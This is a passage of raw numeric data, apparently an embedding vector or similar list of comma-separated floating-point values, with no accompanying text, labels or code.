0853986,-0.0209616,-0.0060785823,0.052657675,-0.009868788,-0.0075375233,0.0021572434,0.006378019,0.004004603,0.0057705813,-0.007962121,0.0035598774,0.0049762786,0.02189346,0.0012654824,-0.012557751,-0.001580315,0.036335677,0.002025938,-0.025883311,-0.010948418,0.008120353,-0.011994232,0.009373683,0.00434461,0.032546677,0.009590432,-0.021230374,0.0008282807,0.017843738,0.010849491,0.031095603,0.010878545,0.042749535,0.01917504,0.0063817566,0.005468152,-0.0022050545,-0.0005335682,-0.0023709172,0.0025477556,0.0018707397,-0.000170748,0.0021337168,-0.016971761,-0.0008099145,-0.0043996996,0.03165653,-0.03409357,0.009406203,-0.006783996,0.0036658428,-0.01150933,-0.00987815,-0.014275059,-0.014099827,-0.017547578,-0.009373823,0.02367503,-0.009004889,0.0054156655,0.0028767146,-0.006076175,-0.011988649,0.00076860195,-0.019555755,-0.004597567,0.028494194,0.006732341,0.018586703,-0.0064655803,-0.053861305,0.026660543,0.0056593353,-0.03192136,-0.0129330745,0.022044357,0.03064771,-0.008307338,0.022242121,0.006182023,0.0056205643,-0.011337925,0.0154043855,0.03354914,0.008995584,-0.0029629378,-0.026645483,-0.018865975,-0.004376201,-0.010648061,-0.024074182,0.004870442,0.0005273816,0.009690036,-0.00004717049,-0.007371447,0.025620578,0.024359347,-0.023571616,0.015878167,0.017953223,0.0040746643,0.021079507,0.023418695,0.04960636,-0.023543792,-0.02085683,0.00046616708,0.001364272,0.020141333,-0.000042582953,-0.0013637755,-0.023278328,0.010606828,-0.008562301,0.007602252,0.0058423877,0.009604335,-0.008863811,0.0019396235,0.015004476,-0.00018042693,-0.004075176,0.006367613,-0.009521182,-0.0043008225,-0.0007082497,-0.016134415,-0.032312647,0.01183708,0.028354561,0.0034318948,-0.03711832,-0.008826899,-0.0029263785,-0.0039671124,0.014074893,-0.009023572,0.01893612,-0.00123279,0.0027721368,-0.020596795,0.006211564,0.019448522,0.0038837607,-0.002084597,0.0051222392,0.02580795,0.035575062,-0.0022362475,0.0030341488,-0.005673817,0.0023500181,-0.017542465,-0.022906058,0.021791935,-0.0010578617,0.0273078,-0.015032286,-0.009050122,-0.0063708965,0.008509116,-0.008624519,0.012535406,-0.0024635838,0.016638204,-0.01773799,-0.040177952,-0.019237915,-0.005025897,-0.0002444593,0.0009349863,0.004293755,-0.035370886,0.0019351047,0.00464958,-0.034984007,-0.014073235,0.006113889,0.010899982,0.016424678,0.020315345,0.0050240075,0.003970201,-0.009023931,0.00479104,-0.015239887,0.0056753154,0.0058325334,0.009129407,-0.039487343,-0.0057195155,0.0032857342,-0.030194545,-0.012832901,-0.0049834684,0.022141304,0.008899287,0.039402947,0.016318599,-0.018428396,-0.0097474875,0.00934515,0.0022794807,-0.0030134835,-0.012793837,0.02173868,0.028170971,-0.019256275,0.0040949206,0.0018515442,-0.010218225,0.01575432,-0.0020837653,0.00046034172,-0.038872004,0.007077682,0.018855697,0.004225741,-0.0010251565,0.029829416,-0.00990154,0.01722284,0.010858011,0.006629058,-0.012854051,-0.0047777332,0.002256851,-0.015388786,0.0054060533,0.009013086,-0.031347346,-0.010882824,-0.00035058297,-0.0500558,-0.003973216,0.01793491,-0.00037605205,0.0119815925,0.012140737,-0.02267175,-0.008061916,-0.010244628,-0.017230667,-0.028257633,0.013268565,0.010374104,-0.014768367,0.015366695,-0.023112193,-0.012604504,-0.012787616,-0.020693166,-0.0056676567,0.0055199172,-0.004270038,0.007976555,-0.014912965,0.00595361,-0.00023862564,0.03822954,0.028095722,0.011171481,0.0038302236,0.0024304136,-0.0204982,-0.027471965,-0.0011935045,0.0039066235,-0.013503989,0.017482935,0.006952319,0.044543907,0.021324188,-0.004165958,-0.0026775901,-0.010734658,-0.0019746749,0.0013717054,-0.00007236649,0.03399933,0.009343454,0.020822542,0.017561587,-0.007037571,0.056794785,0.004614753,-0.0042989827,-0.009362279,0.011327266,0.0027773795,0.011219021,0.020521868,-0.0011682623,0.007866107,-0.023802457,-0.015005167,-0.00684063,0.008038511,0.03019421,0.012740688,-0.009257619,-0.008479556,0.009745858,0.0010537889,-0.0075865975,0.011855031,-0.0045383763,-0.02737772,-0.017266477,-0.020811774,-0.011371952,-0.04772653,0.0125113595,-0.017279325,0.017315196,0.00079572364,-0.03767515,0.007016464,0.017094977,-0.025066078,-0.02303995,-0.027996419,-0.020358779,0.016818078,-0.03604246,-0.0013407086,0.021858077,-0.0037252342,0.0012140153,0.03493114,-0.011422046,-0.007879056,-0.006460425,-0.01437263,0.010996297,0.017698037,0.02029181,0.0053388253,-0.015270966,0.008342529,-0.008923382,-0.0051400266,-0.0067340485,-0.0060652955,0.029901644,-0.018681815,-0.015217731,0.0046887766,-0.023946226,-0.019396443,0.0014456682,-0.023255426,-0.01536824,-0.01894296,0.00787807,-0.024741158,0.010551008,0.012579326,0.032938644,0.010059039,-0.03550907,0.014861558,-0.00061416876,-0.00257615,0.025517415,0.009889643,0.00813771,-0.033145748,0.022270743,0.038920652,-0.005863686,0.0029122864,0.006639587,-0.004499359,-0.0192903,-0.025793929,0.017930316,-0.015321019,0.022592938,0.0076140836,-0.0029098967,0.024331644,-0.014386027,0.022712134,-0.0055718087,0.0043170783,0.013599847,-0.028162323,0.0022805068,-0.015250674,-0.009539338,0.0049555385,-0.002737885,-0.0034380173,0.01990403,-0.021972954,-0.010252705,-0.02155941,0.004290189,-0.0029249964,0.006711143,0.016673345,0.018982623,-0.015642738,0.030272905,0.008348096,0.008656736,0.005894195,0.020622388,-0.009839886,0.017184645,0.008037936,-0.0025288817,-0.01678434,0.011004092,0.030242337,0.012570329,-0.0010747389,-0.01064666,-0.0036321562,-0.01960076,0.023610588,-0.0063954843,0.0010940287,0.021577122,-0.014086976,-0.012577447,0.014528796,-0.00049387844,-0.016185889,0.0047766175,-0.08877169,-0.020469442,-0.013583738,0.0031887048,-0.025834613,0.016758388,-0.010727021,-0.011393743,-0.0034916564,0.013858149,0.0499829,-0.015304286,0.009273521,0.016466103,-0.0059364033,-0.02117017,0.004357872,-0.008351131,0.0036183305,0.006909034,0.0121065555,0.021193339,0.026843742,0.026069855,-0.01228181,0.020013805,0.010549787,0.0027580194,0.0054707592,0.0078100557,-0.000105778825,0.00006551148,0.0012392919,0.023809986,-0.009692967,-0.0047315704,-0.021295495,-0.025263207,-0.009324572,-0.015205383,-0.0048856554,0.019051613,-0.021543091,0.031426962,0.000516749,0.019092191,0.002786639,-0.024918761,-0.006237666,0.015330418,0.028802017,-0.030887276,0.00785137,0.017233048,-0.015584118,-0.026031531,-0.0059070364,-0.0014839829,-0.0115725,0.0034014287,0.011808895,-0.002934235,0.0016799708,0.0079002455,0.011238756,0.033671457,-0.020491408,0.00511283,-0.020909077,-0.011541275,0.0059024463,-0.009223108,0.003330237,-0.020108812,0.0019881267,0.022655213,0.014103362,-0.022375634,-0.015823994,-0.033578925,0.01672452,-0.02572834,-0.0029450175,0.0029296945,-0.010824687,0.010919777,-0.009187373,0.022944165,-0.018767806,0.0071078045,-0.0118095055,-0.013171418,0.00027706733,-0.0073872567,-0.015088177,-0.020622663,0.0030703687,0.026507242,0.0017106392,-0.005246635,-0.009973342,0.0034211373,-0.011397385,0.021813579,0.028581701,-0.0081528,-0.023828726,-0.045619227,-0.0008518065,0.008013699,0.016899176,-0.015784942,-0.01472908,-0.029484916,-0.008034262,0.015156053,0.025512172,-0.013127526,-0.0026697973,-0.01417236,0.01875296,-0.017426882,0.034551375,-0.0161321,-0.013416045,0.017605705,-0.023433961,-0.009312381,0.0001692975,0.041762587,-0.024313927,0.002201938,0.00756384,-0.019427108,0.0382996,-0.008338331,-0.0041987915,0.012760467,0.0134726,-0.008388591,-0.010485679,0.02044598,0.0117178075,-0.022918444,-0.007949648,-0.0028058104,0.021039551,0.01970345,-0.006767188,0.002226141,-0.01981143,-0.012032385,0.0060793324,-0.024835823,0.02133426,-0.008766808,0.003534298,-0.0049491143,-0.016136622,-0.02895901,0.014892441,-0.016754102,0.0066359597,-0.028813189,0.0030460877,0.027345773,0.021297684,-0.0039216275,0.0007159482,-0.01869388,-0.0021836003,0.018546823,0.010945375,-0.01046481,0.012605223,-0.0052951714,-0.0014509046,-0.009927477,-0.009224115,0.019051146,-0.009175434,-0.01222441,0.034869518,0.00240213,0.00082261354,0.009801128,0.024803044,0.010550447,0.009152874,-0.009915215,0.009830077,0.0018898018,0.0012479158,0.0076374756,0.0007842422,0.0045525497,0.02341985,-0.02998557,0.023762397,0.009807787,-0.010256847,-0.0029139293,0.015499206,0.014094808,0.0052946643,0.00044939795,-0.012095335,-0.008366686,0.016651982,0.0036447027,0.00528332,0.010565356,-0.023697989,0.024310324,0.018810038,0.0049058706,-0.05114153,-0.013749808,0.015050564,-0.003783388,-0.010009908,-0.00922113,-0.0035648071,-0.0020893158,-0.01721624,0.0036935834,-0.005679124,0.037514973,-0.011618464,0.018595751,-0.0028962486,0.02288007,0.011757968,0.005578479,0.016844677,-0.005491307,0.008747251,0.019126255,0.007746009,0.0009799394,-0.03364852,0.013217007,-0.008714002,-0.028218731,0.01034319,-0.03521868,-0.018960401,-0.026050018,-0.004036728,-0.0067278,0.007081221,-0.014919543,0.02166176,0.00022875826,-0.012852784,0.03295747,-0.007641298,-0.0005549023,0.009546379,-0.010109344,0.039692674,-0.00040726917,0.009141823,0.010146949,-0.0098323,-0.029586364,-0.03642527,0.0068721552,-0.017026523,0.00079088344,0.022526426,0.028214367,0.011880113,-0.015535623,0.049486704,-0.0096196635,0.019750416,0.010888674,-0.023115642,-0.009875082,0.04646115,0.028544987,0.007820308,0.0062725972,0.005207636,0.017203253,-0.03287647,-0.00950802,-0.023249712,0.0035307829,0.014461989,0.0020416449,-0.014192741,0.014366805,0.015492655,-0.007244399,-0.0006575384,0.0034139904,-0.020930836,0.023395346,0.03467559,0.013606651,0.010316661,0.008172875,-0.008589686,0.020475697,0.01866267,-0.020410113,-0.0020049524,0.02582962,-0.016748318,0.03368521,0.0028261356,-0.01598179,0.011387731,-0.013384827,0.021562962,0.0021498255,-0.014448958,-0.0026815196,0.010844897,0.008101251,-0.01250111,-0.009127418,0.019502725,0.0014994463,-0.011531937,0.012309327,0.034285057,-0.014663375,0.005691276,0.00656418,-0.031196866,-0.011284937,-0.017594716,0.0032428,-0.026997684,-0.018295312,-0.0037630436,-0.013936622,0.01286917,-0.014063824,0.008170465,-0.015060203,-0.01210023,0.011635641,0.00010422671,0.035039615,-0.0016288037,0.0087763965,0.02764419,-0.017269406,0.02902783,0.0007668464,-0.009439838,-0.020854335,-0.010622602,0.019827148,0.0019244144,0.02020253,0.0045463447,0.00016918516,0.007438314,0.017255032,0.023394573,-0.02286941,0.00016481543,0.013293313,0.002549735,-0.020038461,0.015339441,0.0009336551,0.008002964,0.010827642,-0.006623458,-0.014019531,0.007270754,0.0018731274,-0.01851408,0.079095386,0.0011712346,0.015253249,-0.011567242,0.012421489,-0.018133301,0.02318971,0.0016144458,-0.0062487964,0.00037254527,-0.023096653,-0.024592102,0.002557346,-0.02022887,0.015627319,-0.0030011893,0.007134624,0.01365669,-0.0011818153,0.02558706,-0.00806171,-0.011218113,0.008585753,-0.0030928273,0.008663999,-0.016563416,0.029076884,-0.0026437242,-0.0034682713,-0.006859199,-0.011835511,-0.0191356,0.043093327,-0.00090396404,-0.013909919,0.0024569815,0.0060496875,-0.008360271,-0.010379717,0.0012405635,-0.014400154,0.003255861,0.06159276,0.012332932,0.0034018126,-0.015994225,-0.024316255,0.007200974,0.02723031,-0.021956008,0.0019995286,-0.00501316,0.0017445753,0.0003328034,-0.00934964,0.029503552,0.024915041,0.059934836,0.01639773,-0.007996924,0.007602432,0.0417969,-0.0011715956,-0.0074396883,0.0067357942,-0.014187096,-0.010561969,-0.019098174,0.025559055,-0.018172184,-0.020683635,-0.009999019,0.013326237,-0.024711415,-0.0033978948,0.005952421,0.01053838,0.0027590918,0.004455892,0.00013341708,-0.01630161,0.0039207335,0.0063705225,0.025155418,0.0057587903,-0.01345824,-0.006829425,0.0018568973,0.040027436,0.021823743,0.00901158,-0.0050647412,-0.011172936,0.037602477,0.016078487,0.015236546,-0.0029210588,-0.0063965423,-0.038298536,0.005772539,-0.01654354,0.0017263766,0.025539104,-0.008611088,0.026260532,-0.010008815,0.0022709062,-0.042095456,0.018198786,0.022745712,-0.000004858773,0.019839142,-0.014503044,-0.007955837,0.004584965,0.0021742992,0.008032174,-0.0057781464,-0.018907493,-0.023251012,0.0028333813,0.011524931,-0.02017928,-0.043211732,0.009014254,0.09120117,-0.0020578492,-0.0086953305,0.036673076,0.002738161,0.007973574,-0.08743996,-0.0054215947,-0.0059672063,0.0075079002,-0.0130241485,-0.0058670295,-0.00853496,0.0010984167,0.016994853,0.009524396,-0.021715011,-0.015743705,0.0077922656,-0.0045252256,-0.008053732,0.010196219,-0.006299593,-0.0030588724,-0.05007072,0.0009593162,0.018761761,-0.015839646,0.014276346,-0.028612973,-0.0146275,0.0015733007,0.017094124,0.014844052,-0.0021230753,0.0056652385,-0.0036652589,0.019629275,-0.007919485,0.0026875297,0.024891082,-0.015571205,-0.002425042,-0.04202431,-0.10934458,0.0026520907,-0.056315172,-0.051293213,0.010936842,-0.033833414,0.0035002134,0.011549022,0.009314721,-0.023279034,0.019545127,0.022958608,-0.00074456277,-0.0076363822,-0.019726306,-0.011201739,0.0031625896,0.016265422,-0.0028480277,0.008843651,0.0069535295,-0.014026236,-0.016791116,-0.030712983,-0.01816407,0.0065995436,-0.024214674,0.009420612,0.005601627,0.0072374954,-0.0068264236,0.0071007013,-0.01594429,0.007734042,0.0010424996,-0.020153724,-0.031466994,0.008458316,0.0009116055,0.009414522,-0.0147546865,-0.0008096228,-0.031510666,-0.0036628111,-0.010283247,0.030298715,0.022589505,0.01149984,0.011635346,-0.026769025,-0.0038232715,-0.0047096456,-0.01990764,0.028417993,0.015660206,0.00066988333,-0.01493377,-0.012305537,-0.035071753,0.0048692864,-0.01866594,-0.024706488,-0.01360475,0.0094179185,0.006267104,-0.005067516,0.013729029,-0.035873797,-0.018616365,-0.022479145,-0.00834997,-0.0049055126,-0.01010521,-0.0076026446,-0.005491407,0.005221087,-0.011542485,-0.017706614,0.028126342,0.011161548,0.022259606,-0.013562626,0.000836454,-0.01292774,0.03368553,-0.01574548,0.0050685117,-0.0012430323,0.0014765203,-0.006715775,0.03886874,-0.0028298951,0.018620798,-0.007236972,-0.008819347,0.015203997,0.033768248,-0.016458124,-0.013486113,0.022281334,0.0046603843,-0.03868718,-0.008639929,0.026299084,-0.009160739,0.011366728,-0.0007894734,0.007100241,-0.03016939,0.0033256668,-0.0007252666,0.0021062172,0.035677392,-0.013273399,-0.0076939175,-0.0028507495,0.017606724,0.008724521,-0.00018449182,-0.018023493,-0.028707758,0.021909341,-0.015492782,0.010768726,0.0027223534,0.010381742,0.0008522949,0.033865657,-0.022422662,-0.004537975,0.0094455145,0.0029402224,-0.00016797477,0.016837897,0.0010409356,-0.010313915,-0.018434752,0.0067877467,-0.028504692,-0.006883813,0.011338401,-0.007322636,-0.01203043,0.010286342,0.0022172313,-0.009725749,0.018388012,-0.02320826,0.016686765,0.0033271208,0.0031943964,0.012203977,-0.01063371,-0.002650343,-0.0038184482,0.052885205,-0.004859114,-0.028720308,0.022739545,0.009861666,-0.009552312,0.032743152,-0.012522639,-0.0045170994,-0.023639653,-0.03719032,0.013552247,-0.00033351628,-0.0017876962,-0.03589277,0.031664766,-0.00440845,0.017326001,-0.034144215,0.031434532,0.02600185,-0.013751722,0.012332196,0.010616489,0.01571779,-0.005590358,-0.011528437,0.009840358,0.0066447314,0.009618664,0.006719249,-0.007125162,0.018847788,0.011184089,0.018907769,-0.031571113,-0.003529412,-0.017310908,-0.021784564,-0.013220952,0.018306557,0.016432552,-0.003380743,-0.039114024,-0.0060768533,-0.00913005,-0.02042336,-0.0056353128,0.0047162785,-0.005545823,0.014859338,0.011866849,0.004784992,-0.0012758747,-0.011575616,-0.02987624,-0.012757676,0.0021031252,-0.012769954,-0.022427328,0.029107768,-0.007867125,-0.025915325,-0.013132409,-0.026496293,-0.025932513,-0.0014703617,0.01719539,0.0024497074,0.012312885,-0.01250425,0.009286879,-0.007755921,0.009911547,-0.0027980027,-0.00853883,-0.0033298722,-0.016852433,-0.019713122,0.008792556,0.009241218,0.010611208,-0.013040054,-0.0054713194,0.016984843,-0.039341047,-0.02347777,-0.006682864,-0.036537934,0.021505844,0.018166816,-0.013799821,0.031476762,0.0019158515,0.025109863,0.019057054,0.018618159,-0.030068902,0.0035325303,-0.0023183574,0.0069744173,-0.00011780711,-0.011376317,-0.03445665,0.0006481286,-0.023703333,-0.010793658,-0.003499719,-0.016972536,0.0036311366,0.015751448,-0.02231328,0.011033744,-0.028129317,-0.025009679,0.039816104,-0.00759172,-0.019480469,0.015863935,-0.01202193,-0.004823183,-0.012860105,0.003233035,0.006974407,0.007978552,-0.02960139,-0.0053996993,0.0050295442,-0.06283225,0.019712023,-0.00017415945,0.026613737,0.029861987,0.0034103517,-0.022393702,0.013636322,-0.00035296287,0.022708023,-0.0127197355,0.015733782,-0.022502908,-0.0025041641,0.019138573,0.0038288573,-0.021609506,-0.0006278075,-0.001972987,-0.024300145,-0.018031588,0.030124271,-0.0114800045,-0.009676264,-0.00039582487,-0.007309257,0.019783996,-0.0035925084,-0.026613025,-0.0015306914,-0.0113117695,-0.04205922,-0.017295053,-0.00049647666,0.042386882,-0.0041037966,-0.035232607,0.0019653374,0.01910988,-0.013649332,0.03094611,0.0023146213,0.000363518,-0.010229598,-0.011913405,0.007548194,0.022617323,-0.0072059613,0.006032349,0.026310049,0.006208236,-0.023238057,0.009381568,0.025901228,-0.0026116474,-0.000935443,0.0063748783,0.008399513,-0.010046057,0.026352178,0.00083443424,-0.02986102,0.016493738,-0.010030245,-0.008757598,0.015530678,-0.023824193,-0.010660374,0.017407743,-0.01293422,-0.016544156,0.0064810426,-0.0056013414,0.040081196,-0.032806482,-0.017388947,-0.012389162,-0.006620396,-0.0015462647,-0.013878555,-0.02024647,-0.025261743,-0.022508983,-0.0039054863,-0.0077728913,0.004021112,-0.013840199,-0.028600393,0.0074944445,0.0043314137,0.0011623142,-0.02048173,0.0333287,0.0009612249,0.0020811958,-0.0012580914,-0.008668976,-0.023915822,-0.013439537,0.037266467,-0.010818051,-0.0037234812,0.0026493932,0.015094741,0.0000049290365,-0.0061196657,0.009875916,-0.03558866,-0.030425943,-0.035469543,-0.025395608,-0.020316098,-0.009962579,-0.032183215,-0.008932012,-0.01876126,0.001249919,0.0069014546,-0.00862265,0.0053796964,-0.008675799,-0.0029501375,-0.011777416,0.0014529718,-0.03627001,0.027422091,0.013761585,-0.013353703,-0.0021595468,0.008362847,-0.017666642,-0.040110055,-0.00091229344,-0.01795215,-0.00025131376,0.017933244,0.0046204114,-0.013931343,0.027723506,0.02722974,-0.0051073157,0.022006439,0.015373269,-0.011255473,-0.0020682805,0.006385429,0.012586358,-0.03983075,-0.0073670633,-0.02179163,0.020249639,0.02006035,-0.037244763,-0.022820327,0.0138575975,-0.011033452,-0.021868808,-0.005214992,0.016124358,0.022474146,-0.0027927682,-0.013856266,0.002905855,0.021077596,0.0021908004,-0.011958499,-0.012750146,-0.0000019091622,0.002240893,-0.0039781732,0.007568691,0.013284966,0.0145244235,0.0046164338,-0.0044913488,0.029745974,0.010997925,0.0013214299,0.038539145,0.015048717,0.035663355,-0.010193597,-0.0042166305,-0.01097303,0.023633858,-0.022213016,0.017477056,0.014929788,-0.0013235376,0.045535244,-0.007308008,0.010561129,-0.007857154,-0.010431235,-0.0014067863,-0.012633627,-0.02794424,0.0016410793,-0.04007669,-0.0017337202,-0.0034493317,0.0039057482,-0.008396937,-0.02276586,0.02978095,-0.037256554,0.006584692,-0.019976588,-0.014397016,-0.0043119513,-0.012428456,0.010358412,0.030787123,0.029043315,-0.043967012,-0.00044914038,0.02199773,-0.0033442345,-0.011635233,-0.0002863887,-0.0011125415,-0.0062892823,0.01633263,-0.016831513,0.009127306,0.021817721,-0.0010434885,-0.0040153465,-0.011516337,0.021944288,0.0019820896,-0.0048008426,0.0021833854,-0.003969731,0.008691371,-0.005847121,0.0024179772,0.016233783,0.021599604,0.012569476,0.012277582,-0.044676937,0.009521435,-0.004554844,0.027354779,0.0013088275,-0.014955708,-0.0027664145,-0.0066305413,0.014434619,0.0031662588,-0.0060687046,0.028188974,0.047789842,0.003935803,-0.04939546,-0.004306346,-0.0031672816,-0.022227269,0.0062071052,-0.0138187185,0.000107153086,-0.01307138,0.022082312,-0.0078130355,-0.0019453078,-0.006635164,0.0035328625,-0.009355132,0.0061398763,0.023106663,-0.00022752146,-0.019075463,0.007488316,-0.00529989,0.009451245,0.0063051046,-0.008768997,0.00009405311,-0.003751352,0.0024356863,0.03104296,-0.015075257,-0.004981919,0.014984713,-0.016139224,-0.0029197033,-0.01183578,0.0076635056,-0.0072240396,-0.0063921106,0.037631784,0.020600148,-0.012699475,-0.0018746293,0.014379899,0.008677685,-0.0032582767,-0.00385132,-0.0145708285,0.013282737,-0.016957814,0.0025140415,0.0028077532,-0.0024758927,-0.009167914,-0.005940547,-0.028351275,-0.016354246,-0.05122019,-0.020837579,0.0028538066,0.026856732,-0.0054261833,-0.01388843,0.011359842,-0.0077366363,0.014245283,0.013243736,-0.0036002253,-0.013122239,0.0032559952,0.008880061,-0.009454059,-0.009794195,-0.010089136,-0.009553471,-0.00561011,-0.013275174,0.014017127,-0.01831682,-0.013485246,0.008502343,0.0010468863,-0.0108306715,0.003422512,0.01867964,0.0032250702,0.0024554317,-0.009676009,0.005318801,-0.009018353,-0.00003803816,-0.036768015,0.0078203585,0.012803327,-0.01119871,-0.00045181377,0.022632787,0.015824774,0.005186744,0.018280195,0.029941447,-0.012775113,-0.0055529494,0.008360313,0.03498462,-0.0054689245,0.010672686,-0.0065882946,0.01150274,-0.021964235,-0.0137320515,-0.022470566,-0.005930536,-0.012295859,-0.0047281138,-0.007923208,-0.009723901,0.005628591,0.0041105994,-0.0052600014,0.010283633,-0.0065027075,0.014592863,-0.0022747216,-0.008303296,0.018275404,0.021727284,-0.012413772,0.026756562,-0.02210265,-0.035294984,0.022473173,-0.0139638,0.014836605,0.012687372,0.012482601,0.0091559915,0.0053717718,-0.013513306,0.0071841613,0.015601719,-0.029423885,0.012783065,0.027839454,0.010631649,-0.008912634,-0.003129907,0.007480637,0.024016917,0.0040293443,0.028106714,0.009613988,0.0048708892,0.03718222,0.0042065084,-0.008942757,-0.019952072,-0.015010481,-0.032428425,-0.0037274058,0.028844355,-0.012605557,0.019988263,0.029508673,-0.01739004,0.009803134,0.001397378,-0.014677973,0.032883182,-0.01816506,0.004141367,0.031754844,0.011267124,-0.020782765,0.024168571,0.0036253207,0.002906772,0.009258212,0.0035614755,-0.02501313,-0.02198375,0.0046047964,-0.016387276,0.0076401094,0.0061313654,0.0058312183,-0.0070470963,-0.0048645902,0.002781176,0.0090478435,-0.015030117,-0.02182208,-0.004627379,0.0030311826,0.018609092,0.00059555395,0.002908109,0.024538502,-0.0004563617,-0.009305583,0.0020085764,-0.011610399,-0.018282842,0.0042001335,-0.010410926,-0.009720434,-0.0019133926,0.012374077,0.002349168,0.020297986,0.024560167,0.025923673,0.017913274,-0.029304968,0.01348137,-0.017265085,-0.0077587846,-0.009208741,0.021070248,0.02372213,0.00046401456,0.015793564,0.022975393,-0.020429261,0.0066607003,-0.021125264,0.0022354256,-0.010359948,-0.0071082786,0.0024952483,-0.014713435,0.021039166,0.003625562,-0.0058583664,0.027576473,0.014882966,0.035804313,-0.021323014,0.011034167,-0.026855463,-0.011653305,-0.008944275,0.01656299,-0.013420634,-0.004307114,0.0023503036,-0.023787143,0.032358706,-0.017259087,0.0034989435,0.00005912339,0.007337883,0.014112822,0.003137938,0.0058738557,0.007708785,-0.004829809,-0.005041193,0.0043031787,-0.0006226975,0.018867975,0.0033246416,0.018632852,0.0060465387,0.03964665,0.0096611045,0.004737714,-0.013732541,0.036115173,-0.03150372,-0.0030836493,0.008650716,0.014068101,0.015298177,-0.022682948,0.013023763,-0.0020794214,-0.009279344,-0.020876024,0.017926756,0.0051861843,0.0076006134,0.0070487717,0.007976875,0.030871414,-0.028386764,-0.025703827,0.025602834,-0.0005929254,-0.020597579,0.008061029,0.011337027,-0.0036456226,0.024271613,-0.003984849,0.017808413,0.01261697,0.03335791,0.009156058,0.011734423,0.012089044,0.022916093,0.0028921303,-0.010862496,0.015127539,0.0060986164,0.031758517,0.017503347,0.003627982,-0.009552071,-0.0029240954,-0.013941621,0.0009851133,0.013713449,0.016515037,-0.016593713,-0.01426998,-0.038822826,-0.00040422936,-0.03133529,-0.0013179864,-0.029825281,0.024585022,-0.027106408,-0.007101856,-0.00087565655,-0.019817833,0.0029836667,-0.0021669157,0.010411601,-0.0016314226,-0.038245186,-0.009572751,0.014195204,0.014071386,0.0077884817,0.012142541,0.010780817,0.01186646,-0.00657697,0.004574545,-0.009160371,0.024653709,0.010847299,0.0027375177,0.022865487,-0.0051223133,-0.0075918273,-0.014579919,0.007346183,-0.011549558,0.008543939,0.007579564,0.032152425,0.0028504103,0.015972244,0.0055908356,0.012196084,-0.009163769,0.005204114,0.024852606,0.009129548,0.012862001,-0.011875094,0.021945078,0.020628009,-0.0012422228,0.00399043,0.0051745907,-0.005376983,0.007618963,0.013395293,-0.0076938258,-0.014854092,0.014797012,-0.021693591,0.004343678,0.011954088,-0.0021989306,0.022891833,-0.026366906,0.009017882,-0.0012763756,0.0096703665,0.061543573,-0.031619888,0.017495364,0.026702,-0.040369168,-0.008481471,-0.015983194,0.013261624,-0.008045826,0.009195076,0.028038852,-0.0033363877,0.019819204,-0.018904544,0.004227114,0.020857861,0.0068902248,0.012251702,0.020648096,-0.0018391535,0.012799739,-0.023652803,-0.022623986,0.00402805,0.00088529935,0.013933748,-0.006688585,-0.023991799,0.023139926,-0.040788043,0.00086907484,0.016724076,-0.0104883555,-0.041496634,0.02588819,0.0024680824,-0.028876761,-0.0034073382,-0.00481723,-0.021976333,0.0086058155,-0.022076152,-0.0032933368,0.003035988,0.0010985521,-0.017000092,-0.035894733,-0.014887636,-0.06686575,-0.012428165,0.021365754,0.0075452696,0.009248268,-0.0026959772,0.016543828,-0.024413193,0.02609693,0.02771654,-0.020263653,-0.003113767,-0.0020701294,0.020949613,0.0099031115,-0.0018298145,-0.0024121825,0.00993855,-0.011972286,-0.047310803,-0.0087694805,-0.018922344,-0.016385512,-0.012772933,0.040171657,-0.024850182,0.011503855,0.00018718623,0.009526061,-0.0017117619,0.024570316,-0.01693276,-0.014672388,-0.016757183,-0.009584618,0.020986438,-0.027276518,0.013425103,-0.010978548,-0.008257543,-0.005037041,0.007776149,-0.0014754713,0.007048778,-0.014609571,0.02655638,-0.02021191,-0.0055710627,0.0034885285,-0.015264223,0.026343204,0.012768382,-0.013952365,0.03838895,0.0028687357,0.006286524,0.016601438,-0.0089907665,0.00033197488,0.007330638,0.0028796524,-0.014797188,0.025907194,-0.004292087,-0.0055245194,0.014936356,0.011745163,0.024521764,-0.005686976,0.019947618,0.0069206133,-0.023571815,0.002597142,0.0001892345,-0.021790147,0.009945143,0.021309206,0.0007906969,-0.011545185,-0.00092878204,0.081068374,-0.008979456,0.023626406,0.0025361248,0.0012108997,0.010824576,-0.021789791,-0.033622704,0.004277761,0.0068594934,0.023368504,0.005302646,0.017639637,0.00024616517,0.0049960213,0.0037434085,-0.007145277,0.013312808,0.0057230857,0.008630977,0.0020883437,0.004504106,-0.0095297545,0.002915991,0.007053617,0.011995705,-0.010648253,-0.016702209,-0.01860788,-0.026374424,0.004853671,0.027821314,0.035546057,0.019187527,0.017014211,0.01838129,-0.0077157463,0.023482585,0.00069084216,-0.03671691,0.007982547,-0.0027895046,-0.01162913,0.034626503,-0.0008686853,-0.014339633,0.017046923,0.0052266633,-0.006932377,-0.008780124,-0.00716507,0.025706904,0.016606098,0.019976608,-0.00870993,0.019892555,-0.033246573,0.005335843,-0.016996678,0.0103394305,-0.032309413,-0.005507672,0.0038298636,-0.03192905,0.0043924768,0.012668956,-0.0021339166,0.014965856,0.0003960546,-0.003141358,-0.015726106,0.0061351135,-0.01939728,-0.0013959447,0.0015365587,0.0113619855,0.011658518,-0.0006593021,-0.010696337,0.0020977396,-0.006722108,0.036368284,0.008057607,-0.017627334,-0.020722099,-0.0017806251,0.0071679563,0.016277375,0.0017465468,-0.013935785,-0.014800204,-0.009109331,-0.0058054756,-0.00046872484,-0.033081118,-0.015157203,0.014002528,0.031011574,-0.032449596,0.0039638756,-0.025953274,0.021395864,0.00981153,0.017982095,-0.011220786,-0.013706262,-0.0067053554,0.013077801,0.018923206,0.0067177573,0.0008711664,-0.004017423,-0.0048874486,0.009827075,-0.01684085,0.0010391484,-0.00027586456,-0.015832854,-0.018884417,0.0034043791,-0.0035380463,-0.005182286,-0.036744263,0.0051945457,0.036188263,-0.009483555,-0.01190099,0.014929697,-0.020427182,-0.0015595345,-0.00091347087,0.01348838,0.0012137188,0.124016054,0.011538316,0.012128243,0.012532227,-0.0011417324,0.018407024,0.0077472143,-0.0051762457,-0.0017513437,-0.007559605,0.02065567,0.010366183,0.022593318,-0.011169669,0.00378417,0.023571001,0.015285106,-0.033164382,0.011643424,-0.008168036,-0.009892622,-0.027051967,0.012556218,0.0021345895,-0.0032522015,-0.03483167,0.025270024,0.01154141,0.0028671918,0.025212644,-0.008877415,0.012230397,0.009753066,-0.0028833128,-0.013563541,0.0042250277,0.0043799584,0.0007925682,-0.008516286,-0.028622359,0.021270191,0.01472349,-0.0074124327,-0.0059533664,-0.022414232,-0.016060218,0.015499049,-0.02786327,-0.020505201,-0.013822745,-0.0069564553,0.008968429,-0.0040274053,-0.030523302,0.0067446376,0.007290869,-0